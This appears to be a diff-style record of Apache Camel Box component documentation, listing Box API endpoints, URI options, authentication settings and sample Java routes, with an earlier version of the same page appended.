the endpoint\noption\u00a0*`inBody=option`*\u00a0would override a\u00a0*`CamelBox.option`*\u00a0header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be\u00a0`null`.\nNote that the\u00a0`null`\u00a0value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of Box API errors the endpoint will throw a\nRuntimeCamelException with a\n*com.box.sdk.BoxAPIException*\u00a0derived exception\ncause.\n\n==== Endpoint Prefix\u00a0_collaborations_\n\nFor more information on Box collaborations see\nhttps:\/\/developer.box.com\/reference#collaboration-object[https:\/\/developer.box.com\/reference#collaboration-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`collaborations`*\u00a0as\nfollows:\n\n[source]\n----\nbox:collaborations\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFolderCollaboration |add |folderId, collaborator, role |com.box.sdk.BoxCollaboration\n\n|addFolderCollaborationByEmail |addByEmail |folderId, email, role |com.box.sdk.BoxCollaboration\n\n|deleteCollaboration |delete |collaborationId |\n\n|getFolderCollaborations |collaborations |folderId |java.util.Collection\n\n|getPendingCollaborations |pendingCollaborations | |java.util.Collection\n\n|getCollaborationInfo |info |collaborationId |com.box.sdk.BoxCollaboration.Info\n\n|updateCollaborationInfo |updateInfo |collaborationId, info |com.box.sdk.BoxCollaboration\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|collaborationId |String\n\n|collaborator |com.box.sdk.BoxCollaborator\n\n|role |com.box.sdk.BoxCollaboration.Role\n\n|folderId |String\n\n|email |String\n\n|info |com.box.sdk.BoxCollaboration.Info\n|===\n\n==== Endpoint Prefix\u00a0_comments_\n\nFor more information on Box comments see\nhttps:\/\/developer.box.com\/reference#comment-object[https:\/\/developer.box.com\/reference#comment-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`comments`*\u00a0as\nfollows:\n\n[source]\n----\nbox:comments\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileComment |add |fileId, message |com.box.sdk.BoxFile\n\n|changeCommentMessage |updateMessage |commentId, message |com.box.sdk.BoxComment\n\n|deleteComment |delete |commentId |\n\n|getCommentInfo |info |commentId |com.box.sdk.BoxComment.Info\n\n|getFileComments |comments |fileId |java.util.List\n\n|replyToComment |reply |commentId, message |com.box.sdk.BoxComment\n|===\n\nURI Options for\u00a0_comments_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|commentId |String\n\n|fileId |String\n\n|message |String\n\n|===\n\n==== Endpoint Prefix\u00a0_event-logs_\n\nFor more information on Box event logs see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nThe following endpoints can be invoked with the prefix\u00a0*`event-logs`*\u00a0as follows:\n\n[source]\n----\nbox:event-logs\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getEnterpriseEvents |events |position, after, before, [types] |java.util.List\n|===\n\nURI Options 
\n==== Endpoint Prefix\u00a0_event-logs_\n\nFor more information on Box event logs see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nThe following endpoints can be invoked with the prefix\u00a0*`event-logs`*\u00a0as follows:\n\n[source]\n----\nbox:event-logs\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getEnterpriseEvents |events |position, after, before, [types] |java.util.List\n|===\n\nURI Options for\u00a0_event-logs_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|position |String\n\n|after |Date\n\n|before |Date\n\n|types |com.box.sdk.BoxEvent.Types[]\n|===\n\n==== Endpoint Prefix\u00a0_files_\n\nFor more information on Box files see\nhttps:\/\/developer.box.com\/reference#file-object[https:\/\/developer.box.com\/reference#file-object].\nThe following endpoints can be invoked with the\nprefix\u00a0*`files`*\u00a0as follows. \n\n[source]\n----\nbox:files\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|uploadFile |upload |parentFolderId, content, fileName, [created], [modified], [size], [listener] |com.box.sdk.BoxFile\n\n|downloadFile |download |fileId, output, [rangeStart], [rangeEnd], [listener] |java.io.OutputStream\n\n|copyFile |copy |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|moveFile |move |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|renameFile |rename |fileId, newFileName |com.box.sdk.BoxFile\n\n|createFileSharedLink |link |fileId, access, [unshareDate], [permissions] |com.box.sdk.BoxSharedLink\n\n|deleteFile |delete |fileId |\n\n|uploadNewFileVersion |uploadVersion |fileId, fileContent, [modified], [fileSize], [listener] |com.box.sdk.BoxFile\n\n|promoteFileVersion |promoteVersion |fileId, version |com.box.sdk.BoxFileVersion\n\n|getFileVersions |versions |fileId |java.util.Collection\n\n|downloadPreviousFileVersion |downloadVersion |fileId, version, output, [listener] |java.io.OutputStream\n\n|deleteFileVersion |deleteVersion |fileId, version |\n\n|getFileInfo |info |fileId, fields |com.box.sdk.BoxFile.Info\n\n|updateFileInfo |updateInfo |fileId, info |com.box.sdk.BoxFile\n\n|createFileMetadata |createMetadata |fileId, metadata, [typeName] |com.box.sdk.Metadata\n\n|getFileMetadata |metadata |fileId, [typeName] |com.box.sdk.Metadata\n\n|updateFileMetadata |updateMetadata |fileId, metadata |com.box.sdk.Metadata\n\n|deleteFileMetadata |deleteMetadata |fileId |\n\n|getDownloadUrl |url |fileId |java.net.URL\n\n|getPreviewLink |preview |fileId |java.net.URL\n\n|getFileThumbnail |thumbnail |fileId, fileType, minWidth, minHeight, maxWidth, maxHeight |byte[]\n|===\n\nURI Options for _files_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|parentFolderId |String\n\n|content |java.io.InputStream\n\n|fileName |String\n\n|created |Date\n\n|modified |Date\n\n|size |Long\n\n|listener |com.box.sdk.ProgressListener\n\n|output |java.io.OutputStream\n\n|rangeStart |Long\n\n|rangeEnd |Long\n\n|outputStreams |java.io.OutputStream[]\n\n|destinationFolderId |String\n\n|newName |String\n\n|fields |String[]\n\n|info |com.box.sdk.BoxFile.Info\n\n|fileSize |Long\n\n|version |Integer\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n\n|fileType |com.box.sdk.BoxFile.ThumbnailFileType\n\n|minWidth |Integer\n\n|minHeight |Integer\n\n|maxWidth |Integer\n\n|maxHeight |Integer\n\n|metadata |com.box.sdk.Metadata\n\n|typeName |String\n|===\n
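\nAs an illustrative sketch (the direct endpoint and header names are assumed), the copy operation above can take both of its mandatory options from message headers:\n\n[source,java]\n----\n\/\/ copyFile requires fileId and destinationFolderId; newName is optional\nfrom(\"direct:copy\")\n .setHeader(\"CamelBox.fileId\", header(\"fileId\"))\n .setHeader(\"CamelBox.destinationFolderId\", header(\"destinationFolderId\"))\n .to(\"box:\/\/files\/copy\");\n----\n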
\n==== Endpoint Prefix _folders_\n\nFor more information on Box folders see\nhttps:\/\/developer.box.com\/reference#folder-object[https:\/\/developer.box.com\/reference#folder-object].\nThe following endpoints can be invoked with the prefix\n*`folders`*\u00a0as follows. \n\n[source]\n----\nbox:folders\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getRootFolder |root | |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, folderName |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, path |com.box.sdk.BoxFolder\n\n|copyFolder |copy |folderId, destinationFolderId, [newName] |com.box.sdk.BoxFolder\n\n|moveFolder |move |folderId, destinationFolderId, newName |com.box.sdk.BoxFolder\n\n|renameFolder |rename |folderId, newFolderName |com.box.sdk.BoxFolder\n\n|createFolderSharedLink |link |folderId, access, [unshareDate], [permissions] |java.util.List\n\n|deleteFolder |delete |folderId |\n\n|getFolder |folder |path |com.box.sdk.BoxFolder\n\n|getFolderInfo |info |folderId, fields |com.box.sdk.BoxFolder.Info\n\n|getFolderItems |items |folderId, offset, limit, fields |java.util.List\n\n|updateFolderInfo |updateInfo |folderId, info |com.box.sdk.BoxFolder\n|===\n\nURI Options for _folders_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|path |String[]\n\n|folderId |String\n\n|offset |Long\n\n|limit |Long\n\n|fields |String[]\n\n|parentFolderId |String\n\n|folderName |String\n\n|destinationFolderId |String\n\n|newName |String\n\n|newFolderName |String\n\n|info |String\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n|===\n\n==== Endpoint Prefix\u00a0_groups_\n\nFor more information on Box groups see\nhttps:\/\/developer.box.com\/reference#group-object[https:\/\/developer.box.com\/reference#group-object].\nThe following endpoints can be invoked with the prefix\u00a0*`groups`*\u00a0as\nfollows:\n\n[source]\n----\nbox:groups\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|createGroup |create |name, [provenance, externalSyncIdentifier, description, invitabilityLevel, memberViewabilityLevel] |com.box.sdk.BoxGroup\n\n|addGroupMembership |createMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroup |delete |groupId |\n\n|getAllGroups |groups | |java.util.Collection\n\n|getGroupInfo |info |groupId |com.box.sdk.BoxGroup.Info\n\n|updateGroupInfo |updateInfo |groupId, groupInfo |com.box.sdk.BoxGroup\n\n|addGroupMembership |addMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroupMembership |deleteMembership |groupMembershipId |\n\n|getGroupMemberships |memberships |groupId |java.util.Collection\n\n|getGroupMembershipInfo |membershipInfo |groupMembershipId |com.box.sdk.BoxGroupMembership.Info\n\n|updateGroupMembershipInfo |updateMembershipInfo |groupMembershipId, info |com.box.sdk.BoxGroupMembership\n|===\n\nURI Options for\u00a0_groups_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|name |String\n\n|groupId |String\n\n|userId |String\n\n|role |com.box.sdk.BoxGroupMembership.Role\n\n|groupMembershipId |String\n\n|info |com.box.sdk.BoxGroupMembership.Info\n\n|===\n\n==== Endpoint Prefix\u00a0_search_\n\nFor more information on Box search API see\nhttps:\/\/developer.box.com\/reference#searching-for-content[https:\/\/developer.box.com\/reference#searching-for-content].\u00a0The\nfollowing endpoints can be invoked with the 
prefix\u00a0*`search`*\u00a0as\nfollows:\n\n[source]\n----\nbox:search\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|searchFolder |search |folderId, query |java.util.Collection\n|===\n\nURI Options for\u00a0_search_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|folderId |String\n\n|query |String\n|===\n\n==== Endpoint Prefix\u00a0_tasks_\n\nFor information on Box tasks see\nhttps:\/\/developer.box.com\/reference#task-object-1[https:\/\/developer.box.com\/reference#task-object-1].\nThe following endpoints can be invoked with the prefix\u00a0*`tasks`*\u00a0as\nfollows:\n\n[source]\n----\nbox:tasks\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileTask |add |fileId, action, dueAt, [message] |com.box.sdk.BoxUser\n\n|deleteTask |delete |taskId |\n\n|getFileTasks |tasks |fileId |java.util.List\n\n|getTaskInfo |info |taskId |com.box.sdk.BoxTask.Info\n\n|updateTaskInfo |updateInfo |taskId, info |com.box.sdk.BoxTask\n\n|addAssignmentToTask |addAssignment |taskId, assignTo |com.box.sdk.BoxTask\n\n|deleteTaskAssignment |deleteAssignment |taskAssignmentId |\n\n|getTaskAssignments |assignments | taskId |java.util.List\n\n|getTaskAssignmentInfo |assignmentInfo |taskAssignmentId |com.box.sdk.BoxTaskAssignment.Info\n|===\n\nURI Options for\u00a0_tasks_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|fileId |String\n\n|action |com.box.sdk.BoxTask.Action\n\n|dueAt |Date\n\n|message |String\n\n|taskId |String\n\n|info |com.box.sdk.BoxTask.Info\n\n|assignTo |com.box.sdk.BoxUser\n\n|taskAssignmentId |String\n|===\n\n==== Endpoint Prefix\u00a0_users_\n\nFor information on Box users see\nhttps:\/\/developer.box.com\/reference#user-object[https:\/\/developer.box.com\/reference#user-object].\nThe following endpoints can be invoked with the prefix\u00a0*`users`*\u00a0as\nfollows:\n\n[source]\n----\nbox:users\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getCurrentUser |currentUser | |com.box.sdk.BoxUser\n\n|getAllEnterpriseOrExternalUsers |users |filterTerm, [fields] |com.box.sdk.BoxUser\n\n|createAppUser |create |name, [params] |com.box.sdk.BoxUser\n\n|createEnterpriseUser |create |login, name, [params] |com.box.sdk.BoxUser\n\n|deleteUser |delete |userId, notifyUser, force |\n\n|getUserEmailAlias |emailAlias |userId |com.box.sdk.BoxUser\n\n|deleteUserEmailAlias |deleteEmailAlias |userId, emailAliasId |java.util.List\n\n|getUserInfo |info | userId |com.box.sdk.BoxUser.Info\n\n|updateUserInfo |updateInfo |userId, info |com.box.sdk.BoxUser\n\n|moveFolderToUser |- |userId, sourceUserId |com.box.sdk.BoxFolder.Info\n|===\n\nURI Options for\u00a0_users_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|defaultRequest |com.box.restclientv2.requestsbase.BoxDefaultRequestObject\n\n|emailAliasRequest |com.box.boxjavalibv2.requests.requestobjects.BoxEmailAliasRequestObject\n\n|emailId |String\n\n|filterTerm |String\n\n|folderId |String\n\n|simpleUserRequest |com.box.boxjavalibv2.requests.requestobjects.BoxSimpleUserRequestObject\n\n|userDeleteRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserDeleteRequestObject\n\n|userId |String\n\n|userRequest 
|com.box.boxjavalibv2.requests.requestobjects.BoxUserRequestObject\n\n|userUpdateLoginRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserUpdateLoginRequestObject\n|===\n\n=== Consumer Endpoints:\n\nFor more information on Box events see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nConsumer endpoints can only use the endpoint prefix *events* as\nshown in the following example.\n\n[source]\n----\nbox:events\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|events | |[startingPosition] |com.box.sdk.BoxEvent\n|===\n\nURI Options for\u00a0_events_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|startingPosition |Long\n|===\n\n=== Message header\n\nAny of the options\u00a0can be provided in a message header for producer\nendpoints with the *CamelBox.* prefix.\n\n=== Message body\n\nAll result message bodies utilize objects provided by the Box Java SDK.\nProducer endpoints can specify the option name for the incoming message body\nin the *inBody* endpoint parameter.\n\n=== Samples\n\nThe following route uploads new files to the user's root folder:\n\n[source,java]\n----\nfrom(\"file:...\")\n .to(\"box:\/\/files\/upload?inBody=fileUploadRequest\");\n----\n\nThe following route polls the user's account for updates:\n\n[source,java]\n----\nfrom(\"box:\/\/events\/listen?startingPosition=-1\")\n .to(\"bean:blah\");\n----\n\nThe following route uses a producer with dynamic header options.\u00a0The\n*fileId*\u00a0property holds the Box file ID and the *output* property holds\nthe output stream of the file contents, so they are assigned to the\n*CamelBox.fileId* header and *CamelBox.output* header respectively\nas follows:\n\n[source,java]\n----\nfrom(\"direct:foo\")\n .setHeader(\"CamelBox.fileId\", header(\"fileId\"))\n .setHeader(\"CamelBox.output\", header(\"output\"))\n .to(\"box:\/\/files\/download\")\n .to(\"file:\/\/...\");\n----\n","old_contents":"[[box-component]]\n== Box Component\n\n*Available as of Camel version 2.14*\n\nThe Box component provides access to all of the Box.com APIs accessible\nusing https:\/\/github.com\/box\/box-java-sdk\/[https:\/\/github.com\/box\/box-java-sdk]. It\nallows producing messages to upload and download files, create, edit,\nand manage folders, etc. It also supports APIs that allow polling for\nupdates to user accounts and even changes to enterprise accounts, etc.\n\nBox.com requires the use of OAuth2.0 for all client application\nauthentication. In order to use camel-box with your account, you'll need\nto create a new application within Box.com at\nhttps:\/\/developer.box.com\/[https:\/\/developer.box.com].\nThe Box application's client id and secret will allow access to Box APIs\nwhich require a current user. A user access token is generated and\nmanaged by the API for an end user. \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-box<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n----\n\n=== Connection Authentication Types\n\nThe Box component supports three different types of authenticated connections.\n\n==== Standard Authentication\n\n*Standard Authentication* uses the *OAuth 2.0 three-legged authentication process* to authenticate its connections with Box.com. 
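\nA minimal endpoint configuration for this mode might look like the following sketch; all credential values are placeholders, and in practice they should come from secure configuration rather than being hard-coded in the URI:\n\n[source,java]\n----\n\/\/ standard (three-legged) authentication: user credentials plus the\n\/\/ Box application's client id and secret; RAW() prevents URI encoding\nfrom(\"direct:whoami\")\n .to(\"box:\/\/users\/currentUser\"\n + \"?authenticationType=STANDARD_AUTHENTICATION\"\n + \"&userName=RAW(box.user@example.com)\"\n + \"&userPassword=RAW(secret)\"\n + \"&clientId=RAW(my-client-id)\"\n + \"&clientSecret=RAW(my-client-secret)\");\n----\n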
This type of authentication enables Box *managed users* and *external users* to access, edit, and save their Box content through the Box component.\n\n==== App Enterprise Authentication\n\n*App Enterprise Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as a *Service Account* for a *Box Application*. This type of authentication enables a service account to access, edit, and save the Box content of its *Box Application* through the Box component.\n\n==== App User Authentication\n\n*App User Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as an *App User* for a *Box Application*. This type of authentication enables app users to access, edit, and save their Box content in its *Box Application* through the Box component.\n\n=== Box Options\n\n\/\/ component options: START\nThe Box component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | BoxConfiguration\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Box endpoint is configured using URI syntax:\n\n----\nbox:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | BoxApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n==== Query Parameters (20 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Box application client ID | | String\n| *enterpriseId* (common) | The enterprise ID to use for an App Enterprise. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *userId* (common) | The user ID to use for an App User. | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *httpParams* (advanced) | Custom HTTP params for settings like proxy host | | Map\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n| *accessTokenCache* (security) | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *clientSecret* (security) | Box application client secret | | String\n| *encryptionAlgorithm* (security) | The type of encryption algorithm for JWT. Supported Algorithms: RSA_SHA_256 RSA_SHA_384 RSA_SHA_512 | RSA_SHA_256 | EncryptionAlgorithm\n| *maxCacheEntries* (security) | The maximum number of access tokens in cache. | 100 | int\n| *authenticationType* (authentication) | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *privateKeyFile* (security) | The private key for generating the JWT signature. | | String\n| *privateKeyPassword* (security) | The password for the private key. | | String\n| *publicKeyId* (security) | The ID for public key for validating the JWT signature. | | String\n| *sslContextParameters* (security) | To configure security using SSLContextParameters. | | SSLContextParameters\n| *userName* (security) | Box user name, MUST be provided | | String\n| *userPassword* (security) | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n=== Spring Boot Auto-Configuration\n\n\nThe component supports 17 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.box.configuration.access-token-cache* | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *camel.component.box.configuration.api-name* | What kind of operation to perform | | BoxApiName\n| *camel.component.box.configuration.authentication-type* | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *camel.component.box.configuration.client-id* | Box application client ID | | String\n| *camel.component.box.configuration.client-secret* | Box application client secret | | String\n| *camel.component.box.configuration.enterprise-id* | The enterprise ID to use for an App Enterprise. | | String\n| *camel.component.box.configuration.http-params* | Custom HTTP params for settings like proxy host | | Map\n| *camel.component.box.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.box.configuration.private-key-file* | The private key for generating the JWT signature. | | String\n| *camel.component.box.configuration.private-key-password* | The password for the private key. | | String\n| *camel.component.box.configuration.public-key-id* | The ID for public key for validating the JWT signature. | | String\n| *camel.component.box.configuration.ssl-context-parameters* | To configure security using SSLContextParameters. | | SSLContextParameters\n| *camel.component.box.configuration.user-id* | The user ID to use for an App User. 
| | String\n| *camel.component.box.configuration.user-name* | Box user name, MUST be provided | | String\n| *camel.component.box.configuration.user-password* | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n| *camel.component.box.enabled* | Enable box component | true | Boolean\n| *camel.component.box.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n=== URI format\n\n[source]\n----\nbox:apiName\/methodName\n----\n\napiName can be one of:\n\n* collaborations\n* comments\n* event-logs\n* files\n* folders\n* groups\n* events\n* search\n* tasks\n* users\n\n\n=== Producer Endpoints:\n\nProducer endpoints can use endpoint prefixes followed by endpoint names\nand associated options described next. A shorthand alias can be used for\nsome endpoints. The endpoint URI MUST contain a prefix.\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption\u00a0*`inBody`*\u00a0that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format\u00a0*`CamelBox.<option>`*. Note that the\u00a0*`inBody`*\u00a0option\noverrides message header, i.e. the endpoint\noption\u00a0*`inBody=option`*\u00a0would override a\u00a0*`CamelBox.option`*\u00a0header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be\u00a0`null`.\nNote that the\u00a0`null`\u00a0value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of Box API errors the endpoint will throw a\nRuntimeCamelException with a\n*com.box.sdk.BoxAPIException*\u00a0derived exception\ncause.\n\n==== Endpoint Prefix\u00a0_collaborations_\n\nFor more information on Box collaborations see\nhttps:\/\/developer.box.com\/reference#collaboration-object[https:\/\/developer.box.com\/reference#collaboration-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`collaborations`*\u00a0as\nfollows:\n\n[source]\n----\nbox:collaborations\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFolderCollaboration |add |folderId, collaborator, role |com.box.sdk.BoxCollaboration\n\n|addFolderCollaborationByEmail |addByEmail |folderId, email, role |com.box.sdk.BoxCollaboration\n\n|deleteCollaboration |delete |collaborationId |\n\n|getFolderCollaborations |collaborations |folderId |java.util.Collection\n\n|getPendingCollaborations |pendingCollaborations | |java.util.Collection\n\n|getCollaborationInfo |info |collaborationId |com.box.sdk.BoxCollaboration.Info\n\n|updateCollaborationInfo |updateInfo |collaborationId, info |com.box.sdk.BoxCollaboration\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|collaborationId |String\n\n|collaborator |com.box.sdk.BoxCollaborator\n\n|role |com.box.sdk.BoxCollaboration.Role\n\n|folderId 
|String\n\n|email |String\n\n|info |com.box.sdk.BoxCollaboration.Info\n|===\n\n==== Endpoint Prefix\u00a0_comments_\n\nFor more information on Box comments see\nhttps:\/\/developer.box.com\/reference#comment-object[https:\/\/developer.box.com\/reference#comment-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`comments`*\u00a0as\nfollows:\n\n[source]\n----\nbox:comments\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileComment |add |fileId, message |com.box.sdk.BoxFile\n\n|changeCommentMessage |updateMessage |commentId, message |com.box.sdk.BoxComment\n\n|deleteComment |delete |commentId |\n\n|getCommentInfo |info |commentId |com.box.sdk.BoxComment.Info\n\n|getFileComments |comments |fileId |java.util.List\n\n|replyToComment |reply |commentId, message |com.box.sdk.BoxComment\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|commentId |String\n\n|fileId |String\n\n|message |String\n\n|===\n\n==== Endpoint Prefix\u00a0_events-logs_\n\nFor more information on Box event logs see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nThe following endpoints can be invoked with the prefix\u00a0*`event-logs`*\u00a0as follows:\n\n[source]\n----\nbox:event-logs\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getEnterpriseEvents |events |position, after, before, [types] |java.util.List\n|===\n\nURI Options for\u00a0_event-logs_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|position |String\n\n|after |Date\n\n|before |Date\n\n|types |com.box.sdk.BoxEvent.Types[]\n|===\n\n==== Endpoint Prefix\u00a0_files_\n\nFor more information on Box files see\nhttps:\/\/developer.box.com\/reference#file-object[https:\/\/developer.box.com\/reference#file-object].\nThe following endpoints can be invoked with the\nprefix\u00a0*`files`*\u00a0as follows. 
